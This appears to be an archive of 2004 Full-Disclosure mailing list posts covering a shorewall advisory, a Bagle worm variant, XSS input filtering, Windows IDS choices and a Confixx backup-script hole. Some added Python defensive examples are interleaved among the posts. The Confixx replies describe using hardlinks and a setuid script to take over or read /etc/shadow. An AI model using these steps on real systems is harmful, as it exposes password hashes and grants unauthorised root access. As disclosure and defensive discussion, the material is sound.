> > A user might use the restore function to change the ownership of target files to his own. The restore script runs with root privileges. It unpacks the archive, and then executes chown -R $user in the destination directory ($HOME/html or $HOME/files). Before running the restore script, an attacker can make hardlinks to files not owned by himself. The ownership of these files will be changed. On some badly administered systems there is only one disk partition, so it is possible to make a hardlink to /etc/shadow within $HOME.
>
> -Dirk
[Full-Disclosure] MDKSA-2004:080 - Updated shorewall packages fix temporary file vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Mandrakelinux Security Update Advisory

Package name: shorewall
Advisory ID: MDKSA-2004:080
Date: August 9th, 2004
Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2

Problem Description:

The shorewall package has a vulnerability when creating temporary files and directories, which could allow non-root users to overwrite arbitrary files on the system. The updated packages are patched to fix the problem.

As well, for Mandrakelinux 10.0, the updated packages have been fixed to start shorewall after the network, rather than before. After updating the package, if shorewall was previously running, you may need to issue a "service shorewall restart".

References:

http://lists.shorewall.net/pipermail/shorewall-announce/2004-June/000385.html

Updated Packages:

To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security.

You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact security_linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team security linux-mandrake.com
RE: [Full-Disclosure] (no subject)
F-Secure is saying that this is a new variant of Bagle.

http://www.f-secure.com/weblog/

Michael Poulin

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 3:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)

Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?

Jonathan Grotegut
RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
I think we are in agreement - without necessarily having started out that way!

The admin, training and back office costs associated with any authentication mechanism have to be part of the TCO. Secure and portable as smartcards are, their TCO is often prohibitive. Among my customers, OTP devices like SecurID can also be cost prohibitive - but more affordable than smartcards. Biometrics appear to be somewhere between those two cost levels, and password regimes are the lowest TCO.

For these reasons, I suspect, many choose to rely on ID/password regimes, since the admin cost of password regimes is only partially replaced by the equivalent function's overheads in OTP and smartcard regimes - let's not forget permission changes, revocations, and other user maintenance costs. When the cost of password support is added up alongside those aspects, then passwords are very cost effective. As we've just discussed the cost of better authentication tools like biometrics and OTP, then a risk/value judgment will occur inevitably depending on each site's perception of risk.

I deliberately exclude PKI from the preceding since imho, PKI is merely a tool that verifies after the fact, that the correct password was entered at some time.

Lyal

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 10 August 2004 1:01 AM
To: Lyal Collins
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards

Why yes Lyal, it is... Mea culpa...but:

TCO is not as simple as you lay it out for your smartcard either. We were apples-to-apples there for a bit...but, let's drive into your purported TCO costs on the smartcard there, shall we?

First, you seem to have no back-end administration (this is a self-maintained model you have? please explain how that works) to deal with lost cards, forgotten PINs, failed/trashed hardware, etc. Additionally, in any reasonably sized enterprise, you'll need resources allocated to handle new hires, machine moves, upgrades, etc. If you intend to cost-burden the existing staff that's fine...but it's still there.

System integration? You're telling me your smartcard system has none? Unless you just have your system doing authentications at boot, you most certainly do have integration. If you intend to secure some environments more than others, like, at the application level, you have the same integration issues with either system (and probably worse with yours, as RSA has been banging around at this a long time, and the list of apps that RSA can bolt onto is extensive)...so let's call that a wash too.

So let's jack your per-seat price up accordingly, ok? But you know, tell you what, let's leave your TCO where it is and bear in mind that I was responding to a $1000/seat number from you, not the $210 + consultant you just tossed back. (Sorry if this sounds sarcastic, but you've changed the parameters and omitted factors as important to the TCO as I did, and then lowered your number just to sound more cost-effective...not cricket, old boy)

Now, let's take a look at a typical RSA solution, street prices, for 250 users, and remember that the cost scales down from here:

server software (w/24x7 support), about $20,000 US
server hardware (trivial, but let's toss a couple of blades at it just for fun) $10,000 US
Cards (generous here, very) @ $70.00 US X 250 = $17,500 US

I'm going to burden my existing staff with back-end support and admin, just like you did.

So, we have a per-seat, fully burdened TCO of $190/seat

In a mobile workforce there are additional benefits as well, Lyal...like not having laptop users lug around a card reader that they have to a) remember, and b) plug in every time they want to use the PC. You may well respond by saying that's trivial...but then, you aren't the user, he won't say that. The easier we can make his use of secure products and systems the more likely he is to use them, would you agree?

Bart Lansing
Manager, Desktop Services
Kohl's IT

Lyal Collins [EMAIL PROTECTED] wrote on 08/08/2004 02:32:15 AM:

> $10 smartcard
> $200 reader (with pinpad)
> $500-$1000 to have someone (at consultant rates) spend up to a day installing the necessary proprietary drivers, installing batteries (or AC adapter/plugpacks, because smartcards can require more power than a serial port, particularly when just inserted) and training the (typically non-techo) user on how to use the PINpad.
> Then 2-3 years later, repeating the whole process again because they upgraded/rebuilt their machine, and can't get the proprietary drivers to talk to the proprietary reader w/PINpad, or to replace the batteries etc.
> One-time tokens are so much cheaper, and $120-$150 AUD (about US$80) plus $10-$25k for the server software, and a bunch of people time distributing the right token to the right person, plus system integration
RE: [Full-Disclosure] (no subject)
From incidents.org. It appears to be a new W32/Bagle variant.

Updated August 9th 2004 18:59 UTC (Handler: Jason Lam)

* New Bagle (?) Variant Spreading

New Bagle Variant Spreading (PRELIMINARY)

We received a number of reports about a new virus. Based on a quick string analysis, we assume that this will be classified as a new member of the 'Bagle' family. Like prior versions, it includes a lengthy list of URLs. Infected systems will likely attempt to contact these URLs.

All samples received so far arrive without subject. Attachment names are price2.zip, new__price.zip, 08_price.zip, and likely others. The text reads 'price' or 'new price'.

According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and runs from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win_upd2.exe

Mitigation

Temporarily quarantine or reject all ZIP attachments until AV vendors release signatures. You may also want to monitor or block access to the URLs listed below. Some AV programs do already identify this new version as malware using generic signatures.

AV Summary (from http://www.virustotal.com)

BitDefender 7.0/20040809 found [JS.Dword.dropper]
ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
F-Prot 3.15/20040809 found nothing
Kaspersky 4.0.2.23/20040809 found nothing
McAfee 4383/20040804 found [JS/IllWill]
NOD32v2 1.835/20040806 found [Win32/IE.Dword unknown infection type (Exploit)]
Norman 5.70.10/20040806 found [W32/Malware]
Panda 7.02.00/20040809 found [Fichero Sospechoso]
Sybari 7.5.1314/20040809 found [JScript/IE.VM.Exploit]
Symantec 8.0/20040808 found nothing
TrendMicro 7.000/20040804 found nothing

List of URLs (and respective IPs)

Note: From past experience, only a small number of these sites is compromised (if any at all) to update the virus. Most of the sites serve as decoys.
However, virus infected systems will access these sites and if you for example use a web proxy, you may be able to find infected systems. We do not know if any of these sites are used to update the code, or if they are just used to collect information about infected systems.
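The proxy-log check the diary suggests, written out as an added example (not code from the ISC diary or this post): a parser for squid-style access.log lines that flags any client fetching the root-level /2.jpg path from two or more distinct hosts, the beaconing pattern the diary describes. The log lines and the .test hostnames are constructed stand-ins for the decoy sites.

```python
"""Flag proxy clients that fetch http://<host>/2.jpg from several hosts.

Added example, not code from the ISC diary or the list post.  Log lines and
hostnames below are constructed; the .test names stand in for the decoy sites.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# squid native access.log: time elapsed client action/code bytes method URL
# ident hierarchy/peer type.  All lines constructed for this example.
SAMPLE_LOG = """\
1092074400.123   45 10.1.2.34 TCP_MISS/404 421 GET http://decoy-a.test/2.jpg - DIRECT/192.0.2.10 text/html
1092074401.456   33 10.1.2.34 TCP_MISS/404 421 GET http://decoy-b.test/2.jpg - DIRECT/192.0.2.11 text/html
1092074402.789  120 10.1.2.77 TCP_HIT/200 51233 GET http://intranet.test/news/index.html - NONE/- text/html
1092074403.012   40 10.1.2.34 TCP_DENIED/403 1400 GET http://DECOY-C.test/2.jpg - NONE/- text/html
1092074404.345   60 10.1.2.90 TCP_MISS/200 8192 GET http://photos.test/gallery/2.jpg - DIRECT/192.0.2.13 image/jpeg
1092074405.678   52 10.1.2.90 TCP_MISS/200 2048 GET http://decoy-a.test/2.jpg - DIRECT/192.0.2.10 image/jpeg
"""

# Only the root-level path matches: every URL in the diary is http://host/2.jpg,
# while a deeper path such as /gallery/2.jpg is ordinary browsing.
ROOT_2JPG = re.compile(r"^https?://([^/\s:]+)(?::\d+)?/2\.jpg$", re.IGNORECASE)


def parse_squid_line(line: str) -> Optional[Dict[str, str]]:
    """Split one squid native-format line into the fields we need."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return {"client": fields[2], "status": fields[3],
            "method": fields[5], "url": fields[6]}


def find_suspect_clients(log_text: str, min_hosts: int = 2) -> Dict[str, List[str]]:
    """Map client IP -> sorted distinct hosts it requested /2.jpg from, keeping
    only clients that touched at least `min_hosts` hosts.

    Denied requests count too: a blocked client is still an infected client,
    which is exactly what the proxy check is meant to surface.
    """
    hosts_by_client: Dict[str, set] = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_squid_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        match = ROOT_2JPG.match(rec["url"])
        if match:
            hosts_by_client[rec["client"]].add(match.group(1).lower())
    return {client: sorted(hosts)
            for client, hosts in hosts_by_client.items()
            if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for client, hosts in find_suspect_clients(SAMPLE_LOG).items():
        print(f"{client}: {len(hosts)} distinct /2.jpg hosts -> {', '.join(hosts)}")
```

With the constructed log, only 10.1.2.34 is reported; 10.1.2.90 fetched one decoy plus an unrelated gallery image and stays below the threshold.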
[Full-Disclosure] Symbian Trojan Dialer Advisory
== Airscanner Research Labs Advisory ==

Airscanner Corp. has released a detailed analysis of the first ever known Symbian Trojan. For more information please read this article:

http://www.informit.com/articles/article.asp?p=327994&seqNum=1

This is a cell phone based dialer trojan.

= Airscanner Corp http://www.airscanner.com =
[Full-Disclosure] IDS for Windows
Hi,

I'm looking for an Intrusion Detection System (host and/or net) for Windows. It should be free or shareware and perhaps it could work in a Windows/Linux network.

Any idea?

Until then,
Carsten

e-mail: [EMAIL PROTECTED]
www: www.sgcr.net
mobile: +49-173-2137083
fax: +49-6403-96187
Re: [Full-Disclosure] Security hole in Confixx backup script
On Tue, 10 Aug 2004 02:16:24 +0200, Thomas Loch said:

> What if someone creates a shell script that simply cats /etc/shadow and sets the SetUID flag. Then he makes a backup of that file and restores the backup while he prevents the chown command anyhow. All files will remain root, including the script. The execution of this script will print out the shadowed encrypted passwords. This can even be used to chmod the shadow file and make it readable for everyone.

You'd probably have to work a *little* harder than a shell script - most Unixoid systems don't allow the execution of a setUID shell script due to various and sundry race conditions involved (which is why 'suidperl' exists). Other than that, you're on the right track.. ;)
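A restore-side check for the hardlink problem described in this thread, as an added example (not the Confixx restore script): instead of a blind chown -R over a directory the user controls, walk the restore target without following symlinks and refuse to change ownership of anything that carries a second hard link or is not a plain file or directory. The fixture built in demo() is constructed; outside_shadow stands in for /etc/shadow.

```python
"""Restricted recursive chown for a privileged restore job.

Added example, not the Confixx restore script.  The report's problem is a
root-run ``chown -R $user`` over $HOME/html: a hard link to /etc/shadow placed
there beforehand gets chowned along with everything else.  This walk refuses
such entries instead of trusting the tree.
"""
import os
import stat
import tempfile
from typing import Dict, List


def classify_tree(root: str) -> Dict[str, List[str]]:
    """Sort every entry under `root` into 'safe' or 'refused'; touches nothing.

    Safe: a directory, or a regular file with exactly one hard link, on the same
    filesystem as `root`.  Refused: symlinks (never followed), device nodes and
    fifos, anything on another filesystem, and any regular file whose link count
    is above one, because that second name may live outside the tree
    (/etc/shadow on a single-partition box, as the report describes).
    """
    root_dev = os.lstat(root).st_dev
    plan: Dict[str, List[str]] = {"safe": [], "refused": []}
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: a symlink is judged, not its target
            if st.st_dev != root_dev:
                plan["refused"].append(path)
            elif stat.S_ISDIR(st.st_mode):
                plan["safe"].append(path)  # directories always have nlink >= 2
            elif stat.S_ISREG(st.st_mode) and st.st_nlink == 1:
                plan["safe"].append(path)
            else:
                plan["refused"].append(path)
    return plan


def restricted_chown(root: str, uid: int, gid: int, apply: bool = False) -> Dict[str, List[str]]:
    """chown only the entries classify_tree() accepts; returns the plan.

    Defence in depth: the primary fix is to unpack into a fresh, empty directory
    the restore job created itself, so no user-placed link can be present.
    """
    plan = classify_tree(root)
    if apply:
        for path in plan["safe"]:
            os.lchown(path, uid, gid)  # lchown: still never follows a symlink
    return plan


def demo() -> Dict[str, bool]:
    """Constructed fixture: one honest file, one hard link to a file outside
    the restore target (stand-in for /etc/shadow) and one symlink to it."""
    with tempfile.TemporaryDirectory() as base:
        outside = os.path.join(base, "outside_shadow")  # constructed stand-in
        with open(outside, "w") as fh:
            fh.write("root:x:0:0:99999:7:::\n")
        target = os.path.join(base, "html")
        os.mkdir(target)
        honest = os.path.join(target, "index.html")
        with open(honest, "w") as fh:
            fh.write("<html></html>\n")
        linked = os.path.join(target, "notes.txt")
        os.link(outside, linked)  # the pre-restore hard link from the report
        sym = os.path.join(target, "pointer")
        os.symlink(outside, sym)
        plan = restricted_chown(target, os.getuid(), os.getgid(), apply=False)
        return {
            "honest_file_chowned": honest in plan["safe"],
            "hardlink_chowned": linked in plan["safe"],
            "symlink_chowned": sym in plan["safe"],
        }


if __name__ == "__main__":
    print(demo())
```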
Re: [Full-Disclosure] New virus
On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut [EMAIL PROTECTED] said:

> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?

ClamAV picked it up quickly - a freshclam at Aug 9 17:54 UTC included its signature, after the first two to hit me didn't get trapped.

http://isc.sans.org/diary.php?date=2004-08-09

<cite>
Handler's Diary August 9th 2004
Updated August 9th 2004 18:59 UTC

* New Bagle (?) Variant Spreading

New Bagle Variant Spreading (PRELIMINARY)

We received a number of reports about a new virus. Based on a quick string analysis, we assume that this will be classified as a new member of the 'Bagle' family. Like prior versions, it includes a lengthy list of URLs. Infected systems will likely attempt to contact these URLs.

All samples received so far arrive without subject. Attachment names are price2.zip, new__price.zip, 08_price.zip, and likely others. The text reads 'price' or 'new price'.

According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and runs from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win_upd2.exe
</cite>

--
Alan J. Wylie http://www.wylie.me.uk/

Perfection [in design] is achieved not when there is nothing left to add, but rather when there is nothing left to take away. -- Antoine de Saint-Exupery
Re: [Full-Disclosure] IDS for Windows
On Tue, 10 Aug 2004 01:41:56 +0200, Carsten Ruckelshausen [EMAIL PROTECTED] wrote:

> I'm looking for an Intrusion Detection System (host and/or net) for Windows. It should be free or shareware and perhaps it could work in a Windows/Linux network.

Snort is available for Windows (http://www.snort.org/dl/binaries/win32/) as well as Linux. I haven't played around too much with free HIDS for Windows but if you poke around the SANS reading room (http://www.sans.org/rr/) it looks like a number of papers address this issue.

--
Kyle Maxwell
[EMAIL PROTECTED]
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
Whoops, O'Brian is pissed again ;)

Real solution is to have per-input input validation, which will always let some potentially bad things through but help mitigate exposures, and then do things right. Right of course means always binding data to SQL statements and properly performing context-sensitive output encoding.

dd

[EMAIL PROTECTED] wrote:

> On Sat, 07 Aug 2004 06:25:00 -, bitlance winter said:
>
> > #! The first function takes the negative approach.
> > #! Use a list of bad characters to filter the data
> > sub FilterNeg {
> >     local( $fd ) = @_;
> >     $fd =~ s/['\%\;\)\(\\+]//g;
> >     return( $fd ) ;
> > }
>
> *BZZT!!* Wrong. Don't do this in production code, because...
>
> > I have understood that bad characters are ' % ; ) ( +
>
> If it turns out that * (asterisk) is a bad character, you're screwed. If it turns out that *any other* character is bad, you're screwed.
>
> The *proper* way to do the filtering is to *remove* *all* characters not known to be good. Something like:
>
>     $fd =~ s/[^-_ a-zA-Z0-9]//g;
>
> Only pass alphabetic, numeric, space, hyphen, and underscore. Add other characters *only* if you can show they are *not* a problem.
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
On Mon, 09 Aug 2004 19:45:07 PDT, dd said:

> Real solution is to have per-input input validation, which will always let some potentially bad things through but help mitigate exposures, and then do things right.

Actually, you should be doing per-input validation on each field, which tries to totally eliminate the potentially bad for each field, as appropriate for the field in question - my example of alphanumeric, space, hyphen, and underscore may not be suitable for all fields (as one clued person pointed out to me in private mail). A real program will almost certainly end up with a separate filter for each field type.

The *important* part is that you're *not* using 's/[list-of-known-bad]//g', but that you use 's/[^list-of-known-good]//g'. Making the known-good list for each field is the programmer's problem.

How many CGI scripts have had directory traversal issues that would have been completely and totally prevented if they had done the filtering right and dropped the '/' character (and probably '.' too) out? ;)
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
[EMAIL PROTECTED] wrote:

> On Mon, 09 Aug 2004 19:45:07 PDT, dd said:
>
> > Real solution is to have per-input input validation, which will always let some potentially bad things through but help mitigate exposures, and then do things right.
>
> Actually, you should be doing per-input validation on each field, which tries to totally eliminate the potentially bad for each field, as appropriate for the field in question - my example of alphanumeric, space, hyphen, and

<nitpick>
I have always approached input validation more from a business side of things than attempting to filter out bad characters. Mitigation of some attacks is a nice side effect of proper input validation. Making developers sweat over what characters to include tends to confuse things, and scare business people into limiting things to a point that impacts usability of an application.
</nitpick>

> underscore may not be suitable for all fields (as one clued person pointed out to me in private mail). A real program will almost certainly end up with a separate filter for each field type.

I have yet to meet many real programs I guess :) I would say 90% of the applications I see never come close to performing robust input validation, web or otherwise. Most of the small number of applications I do see performing input validation tend to be ASP.NET applications. A trend I put to the addition of field validators with stock validators for common input types. Hopefully it will continue to get easier for developers to implement reasonable (read: low dev and perf hit) input validation, which has always been a sore point in all application development.

It might also be worth saying, for those reading along, that input validation should also look for things like format, size, possibly min, max, and other things.

> The *important* part is that you're *not* using 's/[list-of-known-bad]//g', but that you use 's/[^list-of-known-good]//g'. Making the known-good list for each field is the programmer's problem.

Ah, the black list. Oh the black lists I have seen, crushed, and walked past. The many pages of regex to locate SQL injection that have caused major performance impacts. The injection of NULLs, spaces, and odd encodings that cause failures, heart attacks, and buffer overflows. Oh the black list.

PS- I assume it wasn't really your intent to remove the good chars... <grin>

Of course that raises the question, what to do with bad input? I would suggest in much humbleness that a generic error page be displayed and proper error logging occur. Never attempt to fix such input.

> How many CGI scripts have had directory traversal issues that would have been completely and totally prevented if they had done the filtering right and dropped the '/' character (and probably '.' too) out? ;)

*yawn* silly cgi programmers... Who was just saying we should require developers get a license to code? Some days, as I'm finding hundreds of buffer overflows, encryption that's a bad night out with xor, and home rolled auth, it seems like a good idea... Imagine sending a bad developer to a safe database course for too many SQL injection infractions :)

I'll have to figure out the number of developers who learn from the mistakes found during an application assessment vs. those who do not. I think it's not that bad actually.

dd
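The two filters from this thread side by side, as an added example (not bitlance winter's, Valdis's or dd's code): Python transliterations of the Perl FilterNeg and of the known-good replacement, followed by the per-field, reject-don't-fix validation the later replies argue for. The field names, length limits, numeric range and sample inputs are constructed for the example.

```python
"""Negative vs positive filtering, then per-field validation that rejects.

Added example.  The two regexes are Python transliterations of the Perl in this
thread (FilterNeg and the s/[^-_ a-zA-Z0-9]//g replacement); the field rules,
limits and sample inputs are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


def filter_neg(value: str) -> str:
    """The negative approach from the thread: strip the listed bad characters
    ' % ; ) ( \\ + and trust whatever is left."""
    return re.sub(r"['%;()\\+]", "", value)


def filter_pos(value: str) -> str:
    """The positive approach: keep only alphanumerics, space, hyphen, underscore."""
    return re.sub(r"[^-_ a-zA-Z0-9]", "", value)


class ValidationError(ValueError):
    """Raised for any input that fails its field rule.  Callers show a generic
    error page and log the reason; no 'repaired' value is ever produced."""


@dataclass(frozen=True)
class FieldRule:
    pattern: str              # known-good character set / format, full match
    min_len: int
    max_len: int
    lo: Optional[int] = None  # numeric range, when the field is a number
    hi: Optional[int] = None


# One rule per field, as the thread argues: the good set differs per field.
RULES: Dict[str, FieldRule] = {
    "username": FieldRule(r"[A-Za-z0-9_-]+", 1, 32),
    # no '/' and no '.' at all, so a traversal string cannot be expressed
    "filename": FieldRule(r"[A-Za-z0-9_-]+", 1, 64),
    "quantity": FieldRule(r"[0-9]+", 1, 4, lo=1, hi=1000),
}


def validate_field(field: str, raw: str) -> str:
    """Return `raw` unchanged if it satisfies its rule, else raise."""
    rule = RULES[field]
    if not rule.min_len <= len(raw) <= rule.max_len:
        raise ValidationError(f"{field}: length {len(raw)} outside "
                              f"{rule.min_len}..{rule.max_len}")
    if re.fullmatch(rule.pattern, raw) is None:
        raise ValidationError(f"{field}: character or format not allowed")
    if rule.lo is not None:
        number = int(raw)  # safe: the pattern already proved it is all digits
        if not rule.lo <= number <= rule.hi:
            raise ValidationError(f"{field}: {number} outside {rule.lo}..{rule.hi}")
    return raw


def handle_form(form: Dict[str, str]) -> Tuple[str, Dict[str, str]]:
    """Validate every expected field.  On the first failure return
    ('error', log entry); the reason is for the log, not for the user."""
    accepted: Dict[str, str] = {}
    for field in RULES:
        if field not in form:
            return "error", {"field": field, "reason": "missing"}
        try:
            accepted[field] = validate_field(field, form[field])
        except ValidationError as exc:
            return "error", {"field": field, "reason": str(exc)}
    return "ok", accepted


if __name__ == "__main__":
    probe = "a*b/c;"  # constructed sample: '*' and '/' survive the negative filter
    print(repr(filter_neg(probe)), repr(filter_pos(probe)))
    print(handle_form({"username": "alice_01", "filename": "../../etc/passwd",
                       "quantity": "3"}))
```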
Re: [Full-Disclosure] IDS for Windows
I think one can still find portmon, and perhaps a few others. Did you try a google search prior to asking here?? That's a prime place to start, then perhaps rephrase here asking for experiences others have had with a few products you find and are interested in/fit your needs/abilities?

One thing about a number (most?) of IDS or port-monitoring software: they tend to show the ports they monitor for activity/action as being open. This will attract a tad more attention to the systems they are placed upon, much as a honeypot will. Better to lock down exposed systems in most cases with a firewall that actually drops or denies all connection/probe attempts to unwanted exposures. Firewalling remains the most effective primary, besides just uninstalling or not installing in the first place services un-needed and/or not-understood. IDS systems tend to take a lot of care and feeding to make real use of them in an unwasteful manner, and they are best placed behind a firewall as one more additional warning layer should the firewall incorrectly fail-open, or die, or not start, or somehow miss something your security policy dictates. Placing an IDS at the frontgate tends to make them so noisy that they are soon ignored anyways...

Thanks,

Ron DuFresne

On Tue, 10 Aug 2004, Carsten Ruckelshausen wrote:

> Hi,
>
> I'm looking for an Intrusion Detection System (host and/or net) for Windows. It should be free or shareware and perhaps it could work in a Windows/Linux network.
>
> Any idea?
>
> Until then,
> Carsten
>
> e-mail: [EMAIL PROTECTED]
> www: www.sgcr.net
> mobile: +49-173-2137083
> fax: +49-6403-96187

~~
Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.